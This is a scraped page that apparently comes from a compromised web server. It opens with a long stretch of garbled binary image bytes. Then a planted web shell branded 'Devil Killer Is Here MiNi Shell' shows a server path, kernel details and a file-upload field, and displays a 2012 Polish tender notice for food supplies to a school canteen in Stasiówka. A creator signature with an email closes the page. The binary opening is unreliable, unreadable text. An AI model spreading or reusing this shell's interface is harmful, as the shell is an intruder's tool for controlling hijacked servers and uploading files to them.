JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121220/521634-N-2012.html

<p class="kh_header"><b>Dębica: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH do Zespołu Szkół w Stasiówce - STOŁÓWKA SZKOLNA</b><br>
<b>Numer ogłoszenia: 521634 - 2012; data zamieszczenia: 20.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół w Stasiówce , Stasiówka 130, 39-200 Dębica, woj. podkarpackie, tel. 0-14 6825960, 6778285, faks 0-14 6825960.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH do Zespołu Szkół w Stasiówce - STOŁÓWKA SZKOLNA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa ARTYKUŁÓW SPOŻYWCZYCH do Zespołu Szkół w Stasiówce - STOŁÓWKA SZKOLNA - loco magazyn. 
Realizacja poszczególnych dostaw będzie następować sukcesywnie, tj. wg potrzeb kuchni w szkole, na podstawie zamówień przesyłanych przez Intendentkę, w terminie 2 dni od daty złożonego zamówienia - na ryzyko i koszt Wykonawcy (codziennie od poniedziałku do piątku w godz. od 7.00 - 9.00) w odpowiednio oznaczonych opakowaniach producenta, wraz z rozładunkiem - do pomieszczeń magazynu żywnościowego Zamawiającego - Stasiówka 130 , 39-200 Dębica . 

Zamawiający dopuszcza składanie ofert w 6 częściach : 

Część 1 : Pieczywo, świeże wyroby piekarskie i ciastkarskie. CPV : 15810000-9, 15811100-7 
Szczegółowy opis przedmiotu zamówienia stanowi FORMULARZ ASORTYMENTOWO- CENOWY - Załącznik nr 1 do SIWZ. 

Część 2 : Produkty mleczarskie . CPV : 15500000-3, 15510000-0, 15530000-2, 15431100-9 
Szczegółowy opis przedmiotu zamówienia stanowi FORMULARZ ASORTYMENTOWO- 
CENOWY - Załącznik nr 2 do SIWZ. 

Część 3 : Warzywa mrożone, ryby mrożone, filety rybne i pozostałe mięso ryb . CPV: 15331170-9, 15220000-6 
Szczegółowy opis przedmiotu zamówienia stanowi FORMULARZ ASORTYMENTOWO- 
CENOWY - Załącznik nr 3 do SIWZ. 

Część 4: Produkty zwierzęce, mięso i produkty mięsne. CPV: 15100000-9, 15112210-1, 15111000-9, 15110400-9, 15131133-6 
Szczegółowy opis przedmiotu zamówienia stanowi FORMULARZ ASORTYMENTOWO- 
CENOWY - Załącznik nr 4 do SIWZ. 

Część 5 : Zboża, ziemniaki, warzywa, owoce i orzechy, jaja . CPV: 03200000-3, 03142500-3 
Szczegółowy opis przedmiotu zamówienia stanowi FORMULARZ ASORTYMENTOWO- 
CENOWY - Załącznik nr 5 do SIWZ. 

Część 6 : Różne produkty spożywcze. CPV : 15800000-6 
Szczegółowy opis przedmiotu zamówienia stanowi FORMULARZ ASORTYMENTOWO- 
CENOWY - Załącznik nr 6 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9, 15.91.11.00-7, 15.50.00.00-3, 15.51.00.00-0, 15.53.00.00-2, 15.43.11.00-9, 15.33.11.70-9, 15.10.00.00-9, 15.11.22.10-1, 15.11.10.00-9, 15.11.04.00-9, 15.13.11.33-6, 03.20.00.00-3, 03.14.25.00-3, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania wiedzy i doświadczenia jest spełniony, jeżeli Wykonawca wykaże, że 
w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) -  wykonał  :
-minimum 1 dostawę odpowiadającą swoim rodzajem i wartością dostawie stanowiącej  przedmiot zamówienia , z podaniem jej wartości, przedmiotu, dat wykonania i odbiorców. Wymagane jest wykazanie co najmniej jednej  w/w dostawy o wartości min. 10 000,00 zł brutto oraz załączenie dokumentów potwierdzających, że dostawa ta została wykonana należycie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z art.44 ustawy Prawo zamówień publicznych , wykonawca składa wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu (Załącznik nr 8 do SIWZ), a jeżeli zamawiający żąda dokumentów  potwierdzających spełnianie tych warunków, również te dokumenty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej i zgody obu stron- pod rygorem nieważności takich zmian. 
2. Wyłącznie w przypadku wystąpienia okoliczności których Zamawiający nie mógł przewidzieć w dniu zawarcia umowy możliwa jest zmiana umowy dotycząca :
2) zakresu i sposobu wykonania przedmiotu zamówienia w uzgodnieniu z Wykonawcą w przypadku :
          a) zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży 
             w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
     3)Innych postanowień umowy w przypadkach:
          a) zmiany stawek podatku od towarów i usług,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZESPÓŁ SZKÓŁ W STASIÓWCE 
Stasiówka 130 , 39-200 Dębica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.01.2013 godzina 09:00, miejsce: Sekretariat Dyrektora Zespołu Szkół w Stasiówce: Stasiówka 130, 39-200 Dębica.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo, świeże wyroby piekarskie i ciastkarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Bułka tarta kg 100 2.Bułka zwykła waga 0,10kg Szt.400 3.Chleb graham  krojony 0,80kg szt	80 4.Chleb zwykły bez dodatków waga 900g krojony kg 1000 5.Drożdżówka waga 90g różne nadzienia Szt. 150 6.Kajzerka 0,05 kg szt 1500 7.Pączki waga 80g	szt 150 8.Weka pszenna krojona 0,4kg szt 150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.81.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Jogurt owocowy 150g szt 300 2. Margaryna (o zawartości tłuszczu min. 80%) kg 70 3. Masło extra (o zawartości tłuszczu min. 82%) kg 100 
4. Śmietana o zawartości tłuszczu 18% litr 350 5. Mleko UHT 2% karton litr 1500 6.Twaróg półtłusty kg 150 7. Serki topione mix 200 g szt 100 8. Ser żółty edamski kg 16.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.00.00-0, 15.53.00.00-2, 15.43.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa mrożone, ryby mrożone, filety rybne i pozostałe mięso ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Brokuły kg 30 2.	Bukiet jarzynowy kg 40 3. Filet mrożony - ryba sola limanda, bez skóry, trymowana, zawartość wody do 20% kg 130 4. Kalafior kg 40 5. Mieszanka kompotowa z rabarbarem kg	200 6. Truskawka	kg 100
7. Włoszczyzna paski kg 150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Łopatka wieprzowa b/k kg 180 2. Mięso wieprzowe b/k - szynka surowa 
I klasa kg 200 3. Kiełbasa toruńska kg 300 4. Boczek extra kg 100 5.Filet pojedynczy z kurczaka  kg  300 6. Ćwiartka z kurczaka  kg  350 7. Karkówka b/k kg 300 8. Schab b/k kg 180 9. Smalec kg 200 10. Porcje rosołowe z kurczaka	kg 80 11.	Kurczak świeży kg 150 12. Szynka wiejska (plasterki ) kg 16 13. Polędwica sopocka (plasterki )	kg 16 14.	Parówki śląskie kg	60 
15. Pasztet z indyka 131g szt 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.22.10-1, 15.11.10.00-9, 15.11.04.00-9, 15.13.11.33-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zboża, ziemniaki, warzywa, owoce i orzechy, jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Fasola kg 80 2.	Marchew	kg 100 3.	Cebula kg 150 4. Buraki ćwikłowe kg 50 5. Seler kg  80 6. Zielenina szt 200 7. Jabłka	kg 200 8.	Kapusta kwaszona kg  300 9. Pieczarki kg  110 10. Ziemniaki kg 3500 11. Cytryny kg 25 
12. Banany kg 50 13. Groch łuszczony	kg 25 14.	Czosnek	kg 15 15.	Ogórek świeży kg  80 16. Surówka	kg 400 17. Pietruszka kg 80 18. Ogórek kwaszony kg 70 19. Klementynka kg 25 20. Jajka szt 4000 21. Pomidor kg 30
22. Kapusta biała kg 20 23. Kapusta pekińska szt 20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cukier	kg 100 2.	 Makaron z pszenicy durum	kg 200 3.	Przyprawa do zup w płynie	litr 20 4.	Koncentrat pomidorowy 4550 g szt 30 5. Musztarda (900g) szt 5 6. Pieprz czarny	kg 5 7. Kostki rosołowe (60g) szt 160 
8. Kukurydza (425 ml) szt 25  9. Pieprz ziołowy (700g) szt	 4 10. Kminek (1000g)	szt 2 11.	Chrzan tarty (180g) szt 10 12. Sól jodowana kg	100
13. Ocet 10% (0,5l) szt 40 14. Olej uniwersalny	l 25 15. Mąka żytnia typ 580 kg 35 16. Mąka pszenna luksusowa kg 150 17. Jarzynka - przyprawa kg 20 18. Kasza jęczmienna gruba kg 150 19. Galaretka owocowa  (różne smaki) szt 50 20. Ogórki konserwowe (900ml) szt 200 21.	Koncentrat barszczu czerwonego 0,3l szt 20 22. Ryż długoziarnisty, biały kg 120
23. Majeranek (150g) szt 2 24. Liść laurowy (150g) szt 2 25. Papryka cięta (4,25l)	szt 2 26.	Groszek konserwowy 400g szt 30 27. Miód wielokwiatowy 370g szt	8 28. Ketchup łagodny 290 g	szt 8 29.	Cukier puder kg 10 
30. Cukier waniliowy 32g szt  60 31. Płatki kukurydziane  kg 20 32.	Kakao rozpuszczalne 300g szt  60 33. Kawa zbożowa Inka Puszka 200g szt 10
34. Krem czekoladowy 350g	szt 18 35. Dżem truskawkowy 280g szt 50
36. Budyń waniliowy 64g szt	50 37. Kisiel owocowy 58 g (różne smaki) szt 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com